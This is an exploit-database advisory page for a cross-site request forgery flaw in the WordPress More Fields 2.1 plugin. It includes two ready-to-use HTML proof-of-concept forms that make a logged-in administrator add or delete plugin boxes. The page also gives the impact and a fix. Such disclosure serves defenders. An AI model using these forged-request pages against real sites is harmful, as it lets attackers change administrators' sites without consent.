Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress More Fields 2.1 Plugin - Cross-Site Request Forgery

🗓️ 29 Feb 2016 00:00:00Reported by Aatif ShahdadType 
zdt
 zdt🔗 0day.today👁 20 Views

WordPress More Fields 2.1 Plugin CSRF Vulnerabilit

Code
# Exploit Title: Wordpress More Fields Plugin 2.1 Cross-Site Request Forgery 
# Date: 28-02-2016
# Software Link: https://wordpress.org/support/plugin/more-fields
# Exploit Author: Aatif Shahdad
# Twitter: https://twitter.com/61617469665f736
# Contact: [email protected]
# Category: webapps
  
1. Description
    
The plugin More Fields has CSRF token validation disabled for all functions, including the add box and delete box options. As a result, a specially crafted attacker page could cause
a logged-in administrator to add and delete any number of extra fields in any number of additional boxes on the Write/Edit page in the Admin.
    
2. Proof of Concept
  
Login as admin to the wp-admin area at http://example.com/wp-admin. Open the following Proof-Of-Concept with the browser that you used to log in.
 
POC to add box named ‘test’:
 
--POC begins--
Add Boxes:
 
<html>
  <body>
    <form action="https://example.com/wp­admin/options­general.php?page=more-
fields&action=save&keys=_plugin%2C57UPhPh&navigation=boxes" method="POST">
      <input type="hidden" name="label" value="test" />
      <input type="hidden" name="post&#95;types&#91;&#93;" value="press" />
      <input type="hidden" name="position" value="left" />
      <input type="hidden" name="fields" value="" />
      <input type="hidden" name="ancestor&#95;key" value="" />
      <input type="hidden" name="originating&#95;keys" value="&#95;plugin&#44;57UPhPh" />
      <input type="hidden" name="action" value="save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
 
Remove Boxes needs the following simple GET request (Assuming the name of the Box we want to delete is ‘test’):
 
<html>
  <body>
    <form action="https://example.com/wp­admin/options­general.php">
      <input type="hidden" name="page" value="more&#45;fields" />
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="action&#95;keys" value="&#95;plugin&#44;test" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
 
Note: I have removed the CSRF tokens from the requests as they are redundant and not validated.
 
--End of POC--
 
 
3. Impact
 
The attacker can add/delete any number of extra fields in any number of additional boxes on the Write/Edit page in the Admin.
 
4. Solution:
    
Add in CSRF token validation to the plugin or switch to a different plugin. The development of the Plugin has ceased so this happens to be the latest version which can’t be upgraded as of now.

#  0day.today [2018-01-08]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Feb 2016 00:00Current
7.1High risk
Vulners AI Score7.1
wordpressmore fieldscsrfvulnerabilityadminattackvalidationplugin
20